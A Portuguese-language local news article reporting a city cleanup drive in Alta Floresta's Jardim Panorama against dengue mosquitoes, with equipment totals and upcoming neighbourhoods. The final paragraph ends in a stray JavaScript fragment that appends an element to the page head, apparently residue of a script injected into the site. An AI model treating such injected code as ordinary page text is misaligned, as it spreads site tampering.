Capa / Cidades / Campanha retira 80 caminhões de lixo do Jardim Panorama

Campanha retira 80 caminhões de lixo do Jardim Panorama

MIOLOLindomar Leal
Assessoria da PMAF

O Jardim Panorama foi o primeiro bairro a receber “O Mutirão da Limpeza”, este projeto está sendo realizado pela Prefeitura de Alta Floresta, e retirou, em sua primeira ação, cerca de 80 cargas de lixo seco e entulhos. A campanha faz parte do plano emergencial e conta com a força tarefa das Secretarias de Saúde e da Infraestrutura, cabendo a primeira a borrifação de inseticidas e orientação aos moradores sobre o manuseio do lixo. Este serviço tem o objetivo de combater a proliferação do mosquito Aedes aegypti, prevenindo doenças, como a Dengue, o Zika vírus e Chikungunya.
Para executar o trabalho a Secretaria Municipal de Infraestrutura enviou 5 caminhões, 3 pás carregadeiras, 01 retroescavadeira, 9 roçadeiras manuais, 01 trator com roçadeira e mais de quinze funcionários. A empresa Arte Jones também enviou 01 caminhão basculante para auxiliar nos serviços. Todo o lixo retirado pelos caminhões foi transportado para o Lixão Seco, localizado na vicinal Primeira Norte.
Os moradores aprovaram tanto o Mutirão de Limpeza quanto a Força Tarefa realizada pela prefeitura. O empresário Danilo Franke Paul, proprietário de uma funilaria e morador há 23 anos no bairro Jardim Panorama, elogiou a ação, porém, foi taxativo ao criticar aquelas pessoas que não cuidam do quintal. Na opinião dele, a prefeitura deveria adotar medidas severas contra esse tipo de conduta, “isso só está acontecendo porque o pessoal não cuida do lote da sua casa. Se a população tivesse cuidado com o que é dela a prefeitura não precisava se preocupar em fazer esse tipo de serviço, poderia estar arrumando as vicinais e outras estradas. Então, acho que deveria multar”, afirmou indignado.
O cronograma de trabalho definido pela Secretaria Municipal de Saúde prevê a execução do Mutirão de Limpeza e a Força Tarefa da Saúde em 37 setores da cidade. O Mutirão foi concluído na manhã desta quarta-feira (13.01) no bairro Jardim Panorama, e na sequencia será iniciado no Jardim Renascer.

Próximos bairros contemplados
Os próximos bairros contemplados serão: Jardim Primavera, Jardim das Oliveiras, Jardim Tropical, Jardim Universitário, Parque dos Oitis, Residencial das Mangueiras e Parque dos Lagos.
Todos estes bairros estão localizados à margem esquerda da Rodovia MT 208, para quem trafega indo no sentido do município de Paranaíta. Após concluir o serviço nestes bairros, o plano emergencial deverá entrar no Jardim Araras e Boa Nova I, II e III.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top